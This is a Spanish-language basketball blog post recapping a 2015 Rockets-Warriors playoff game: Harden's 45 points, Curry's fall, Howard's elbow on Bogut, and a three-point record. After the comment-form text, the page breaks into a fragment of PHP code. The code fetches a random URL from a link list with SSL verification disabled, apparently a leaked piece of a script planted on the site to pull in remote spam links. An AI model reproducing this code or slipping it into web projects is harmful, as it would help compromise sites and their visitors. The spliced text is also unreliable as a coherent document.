La Crónica: James Harden quiere visitar de nuevo la bahía

26 de May de 2015 por txusma

Con un 3-0 a su favor y jugando fuera de casa podemos permitir a los Warriors salir un poco relajados e ir entrando en el partido poco a poco según se vayan sintiendo más cómodos sobre la cancha. Posiblemente ese era el plan pero lo cierto es que se les fue un poco de las manos. Los Rockets anotaron 45 puntos (¡45!) en los primeros 12 minutos con un Josh Smith que se aprovechó de la nula defensa rival y anotó los 5 tiros que intentó. Al inicio del segundo cuarto la ventaja local tocó techo al llegar a los 25 puntos y tuvo que llegar Draymond Green con 9 puntos consecutivos a sacar a los suyos del ensimismamiento en el que estaban instalados. La diferencia no disminuía pero al menos ya no iba a más. Con los Rockets 21 puntos arriba a falta de unos 6 minutos para el descanso, los locales montan un contraataque y Trevor Ariza se plantó solo ante la canasta. Por el rabillo del ojo ve llegar a un rival y finta el tiro lo que provoca que el rival, que intentaba taponar, vuele por encima suyo, se voltee y golpee con su cabeza contra el suelo. Todo muy doloroso y espectacular y más tras comprobar que el jugador caído en el suelo era el mismísimo MVP de la temporada, Stephen Curry. El base de los Warriors se tuvo que retirar a los vestuarios y estuvo fuera del partido unos 12 minutos pero por suerte todo quedó en un susto y pudo reincorporarse a medio tercer cuarto. La baja de Curry, lejos de hundir a los suyos, pareció espolearlos. Klay Thompson entró en combustión y anotó 16 puntos con 4 triples incluidos. A la chita callando y sin Curry, los Warriors se colocaban a solo 10 puntos de los Rockets al llegar al descanso. 

En la segunda parte empezó el show James Harden, hasta el momento algo apagado. De su mano la diferencia volvió a aumentar hasta los 18 puntos y los 15 puntos de ventaja con los que llegaron los locales al último cuarto parecían definitivos. Minutos antes Dwight Howard se había librado de la expulsión tras propinar un codazo a Andrew Bogut que a simple vista parece mucho más voluntario que el que ayer Al Horford le dio a Matheew Dellavedova. No estaría mal que los árbitros explicaran claramente cual es el criterio para tranquilidad de los aficionados.

Como decíamos, los 15 puntos parecían definitivos pero un parcial de 14-5 a favor de los visitantes les dejó a solo 7 puntos y obligó a James Harden a volver a pista. El efecto fue inmediato y las diferencia volvieron a dispararse por encima de los 15 puntos. Sin embargo, los Warriors no se rendían y aún consiguieron volver a ponerse por debajo de los 10 puntos a falta de 2 minutos para el final, pero una canasta del propio Harden (45 puntos al final) acabó por enterrar sus posibilidades.

Entre ambos equipos anotaron 37 triples (20 Warriors, 17 Rockets), primera vez en la historia que dos equipos anotan más de 15 triples en un mismo partido, una prueba más del baloncesto moderno que está tan en boga últimamente. Aún he de decidir si me gusta o no.

Volvemos a la bahía, quien sabe si sin Dwight Howard que podría ser sancionado por su acción sobre Bogut. De todas maneras, con Howard o sin Howard pocos deben de esperar que los Rockets sean capaces de asaltar el Oracle Arena. Estuvieron cerca en los dos primeros partidos pero Curry y los suyos saben que no pueden permitirlo si quieren disputar sus primeras finales desde 1975.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>